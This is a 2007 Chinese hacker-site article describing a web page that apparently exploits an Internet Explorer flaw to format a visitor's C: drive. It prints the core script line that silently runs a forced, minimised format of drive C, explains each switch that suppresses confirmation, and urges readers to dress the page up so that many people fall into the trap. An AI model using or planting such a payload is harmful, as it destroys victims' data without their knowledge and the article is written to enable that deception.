|
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
|
|
||||||||
|
||||||||
|
|||||
| 有关HTML代码的另类应用 | |||||
作者:哽咽 文章来源:CnXHacker.Net 点击数: 更新时间:2007-6-2 ![]() |
|||||
|
这个是一个关于HTML代码攻击的,虽然短点大家看看怎么样,能实现的哦。 现在的Windows操作系统实在是很方便,连格式化都是只用鼠标点点就可以了,不用象以前那样要输入命令来完成格盘。 我们要做一个格本地磁盘网页并不是很难,会HTML代码的朋友一定是没有什么问题的,这个其实就是利用一下IE的漏洞来实现我们的目的。 下面我们看一下下面的代码我们就会发现其中的奥妙所在了。
对于HTML代码了解的朋友们一定看出来了吧,这段代码的利害之处就在于最后一句,格你的磁盘没商量。 下面我们来看看这段代码的,具体的分析一下的他的工作原理是怎么样的。 首先,我们来看看这一句
wsh.run('start.exe /m format c:/q/autotest/u') 这句就是我们这里所要讲的核心东西了,对于format 这个命令大家不会陌生的吧,只要知道这个命令的朋友,一定会知道这句命令的意思的,我就在这里不在多说什么了。 在这里我把他的一些参数,简要的说说,大家会更加明白的。 在进行格盘的时候系统会与你进行对话,是否进行的,大家看到这个参数了吗/autotest他会强制性的对你的硬盘进行格式化,而不再进行询问;/q/u这两个参数为系统不需要检查立执行。在上一句中的start.exe与/m选项配合,哈哈,相信在执行时以最小化的状态进行,谁都会头痛的。 在这段代码里,核心语句
我们只要对这段代码进行改动相信会出现更多不同的变化。在应用的时候把自己HTML代码做的漂亮一些,相信一定会有很多的人会上当,不小心中了你的圈套。 |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| “HTML制毒者”躲避查杀 降低 HTML七种加密解密 有关禁止U盘(移动硬盘)自动播 苹果修正Safari欺诈和HTTP重 Web页面安全 HTML代码优化注 微软Mix07大会Silverlight成 微软Sliverlight拟兼容多平台 微软公测WEB新技术Silverlig 有关安全软件的使用注意事项 微软开放Silverlight源码 向 |
网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
| » CnXHacker.CoM | © CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |